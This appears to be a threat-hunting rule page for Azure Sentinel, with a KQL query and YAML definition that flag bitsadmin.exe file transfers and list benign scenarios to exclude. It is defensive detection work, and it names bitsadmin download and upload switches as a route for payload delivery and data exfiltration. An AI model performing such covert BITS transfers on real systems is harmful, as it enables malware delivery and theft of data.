Unusual BITSadmin activity may indicate an adversary leveraging the Background Intelligent Transfer Service to exfiltrate data or deploy malicious payloads. SOC teams should proactively hunt for this behavior in Azure Sentinel to identify potential covert data transfer or persistence mechanisms.
KQL Query
DeviceProcessEvents
| where
(FileName =~ "bitsadmin.exe" or column_ifexists('ProcessVersionInfoOriginalFileName','ColumnNotAvailable') =~ 'bitsadmin.exe')
and ProcessCommandLine has_any ('/Transfer','/AddFile', '/AddFileSet','/AddFileWithRanges')
| extend
ParsedCommandLine = parse_command_line(ProcessCommandLine,'windows')
| extend
RemoteUrl = tostring(ParsedCommandLine[-2]),
LocalFile= tostring(ParsedCommandLine[-1]),
Direction = iff(ProcessCommandLine has "/Upload", 'Upload', 'Download')
| project-reorder
Timestamp,
DeviceId,
DeviceName,
Direction,
RemoteUrl,
LocalFile,
InitiatingProcessFolderPath,
InitiatingProcessAccountDomain,
InitiatingProcessAccountName,
InitiatingProcessSHA256,
ProcessCommandLine
id: 2458e226-76e6-458c-8bf7-8766cc993b82
name: Bitsadmin Activity
description: |
Background Intelligent Transfer Service (BITS) is a way to reliably download files from webservers or SMB servers.
This service is commonly used for legitimate purposes, but can also be used as part of a malware downloader.
Additionally, bitsadmin can be used to upload files and therefore can be used for data exfiltration. This
query will identify use of bitsadmin.exe for either purpose and will identify directionality file transfer
directionality.
tactics:
- Persistence
- CommandAndControl
- Exfiltration
requiredDataConnectors:
- connectorId: MicrosoftThreatProtection
dataTypes:
- DeviceProcessEvents
query: |
DeviceProcessEvents
| where
(FileName =~ "bitsadmin.exe" or column_ifexists('ProcessVersionInfoOriginalFileName','ColumnNotAvailable') =~ 'bitsadmin.exe')
and ProcessCommandLine has_any ('/Transfer','/AddFile', '/AddFileSet','/AddFileWithRanges')
| extend
ParsedCommandLine = parse_command_line(ProcessCommandLine,'windows')
| extend
RemoteUrl = tostring(ParsedCommandLine[-2]),
LocalFile= tostring(ParsedCommandLine[-1]),
Direction = iff(ProcessCommandLine has "/Upload", 'Upload', 'Download')
| project-reorder
Timestamp,
DeviceId,
DeviceName,
Direction,
RemoteUrl,
LocalFile,
InitiatingProcessFolderPath,
InitiatingProcessAccountDomain,
InitiatingProcessAccountName,
InitiatingProcessSHA256,
ProcessCommandLine
| Sentinel Table | Notes |
|---|---|
DeviceProcessEvents | Ensure this data connector is enabled |
Scenario: Scheduled System Updates via BITS
Description: Windows Update may use BITS to download updates in the background.
Filter/Exclusion: Check for CommandLine containing wuauclt.exe or Update.exe, or filter by ProcessName matching wuauclt.exe.
Scenario: Legitimate Software Installation Using BITS
Description: Some enterprise software (e.g., Microsoft Office, Adobe products) may use BITS for silent installation.
Filter/Exclusion: Filter by ProcessName matching known installers (e.g., setup.exe, msiexec.exe) or check for CommandLine containing installation package names.
Scenario: BITS Job for Backup or Sync Tasks
Description: IT administrators may schedule BITS jobs for data synchronization or backup tasks.
Filter/Exclusion: Filter by JobName containing keywords like “backup”, “sync”, or “syncro” or check for CommandLine containing bitsadmin.exe with known job names.
Scenario: BITS Used for Software Distribution via Group Policy
Description: IT may use BITS to distribute software via Group Policy Objects (GPOs).
Filter/Exclusion: Filter by ProcessName containing gpupdate.exe or GroupPolicy.exe, or check for CommandLine containing bitsadmin.exe with GPO-related job names.
Scenario: BITS Used for Offline Content Download
Description: Users may use bitsadmin.exe to download large files (e.g., ISOs, media files) for offline use.
Filter/Exclusion: Filter by CommandLine containing bitsadmin.exe with job names like “offline_download” or check for User field matching known users with legitimate download needs.